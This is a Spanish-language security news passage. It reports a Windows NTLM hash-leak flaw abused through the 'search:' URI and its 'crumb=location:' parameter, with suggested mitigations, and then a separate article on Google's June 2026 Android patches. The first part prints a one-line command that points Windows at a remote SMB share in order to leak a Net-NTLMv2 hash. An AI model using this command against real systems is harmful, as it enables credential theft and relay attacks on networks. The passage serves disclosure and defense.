Específicamente, el problema tenía que ver con el hecho de que el controlador de URI de la herramienta de recorte aceptó un parámetro «filePath», no pudo validarlo y llegaría a cualquier ruta de la Convención de nomenclatura universal (UNC) que se le pasara. Esto, a su vez, podría activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.

La deficiencia recién descubierta logra el mismo objetivo final usando «buscar:» y «crumb=ubicación:» en lugar de «filePath» usando un comando como el siguiente:

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

«Utilizó el mismo mecanismo de fuga NTLM, produjo la misma fuga Net-NTLMv2, tenía los mismos requisitos previos y tenía la misma calificación Moderada», dijo el investigador de Huntress, Andrew Schwartz. Vale la pena señalar que el uso de un parámetro «crumb» para robar el hash (CVE-2023-35636) era documentado por Varonis en febrero de 2024.

Como resultado, un actor de amenazas podría aprovechar el hash capturado para realizar ataques de retransmisión y obtener un acceso más profundo a una red. Tras la divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema y afirmó que «solo los casos de gravedad importantes y críticos cumplen con nuestro estándar de servicio».

En ausencia de una solución, se recomienda bloquear SMB saliente (TCP/445 y TCP/139) en hosts que no lo necesitan, aplicar la firma SMB para que los hashes capturados no puedan transmitirse a servicios internos y deshabilitar NTLM cuando corresponda.

La actualización de Android de junio de 2026 de Google corrige 124 fallas, una de ellas explotada activamente – CYBERDEFENSA.MX

Google el lunes liberado parches para 124 vulnerabilidades de seguridad que afectaron a su sistema operativo Android durante el mes de junio de 2026, incluida una falla de alta gravedad en el componente Framework que ha sido objeto de explotación activa.

Registrado como CVE-2025-48595 (puntuación CVSS: 8,4), el fallo de seguridad se ha descrito como un caso de escalada de privilegios sin necesidad de interacción del usuario. La vulnerabilidad afecta a los dispositivos que ejecutan las versiones de Android 14, 15, 16 y 16 QPR2 (versión trimestral de plataforma 2).

«En múltiples ubicaciones, existe una manera posible de lograr la ejecución de código debido a un desbordamiento de enteros», según un descripción de la vulnerabilidad en CVE.org. «Esto podría llevar a una escalada local de privilegios sin necesidad de privilegios de ejecución adicionales. No se necesita la interacción del usuario para la explotación».

Ciberseguridad

Google ha reconocido que hay indicios de que CVE-2025-48595 puede estar bajo «explotación limitada y dirigida». Como suele ser el caso, el gigante tecnológico no reveló ningún detalle sobre quién podría haber estado detrás de la actividad, los objetivos afectados y la escala de dichos esfuerzos.

Dicho esto, los proveedores comerciales de software espía han utilizado fallas similares como armas para atacar a personas de alto perfil como parte de ataques extremadamente dirigidos.

En otros lugares, se han solucionado una serie de vulnerabilidades en el componente del sistema, la más grave de las cuales podría provocar una escalada local de privilegios sin necesidad de privilegios de ejecución adicionales.

Google ha lanzado dos conjuntos de parches: los niveles de parche de seguridad 2026-06-01 y 2026-06-05, y este último incluye todas las correcciones del primer conjunto, junto con parches para el kernel y los componentes del chipset de terceros de Imagination Technologies, MediaTek, Qualcomm y Unisoc.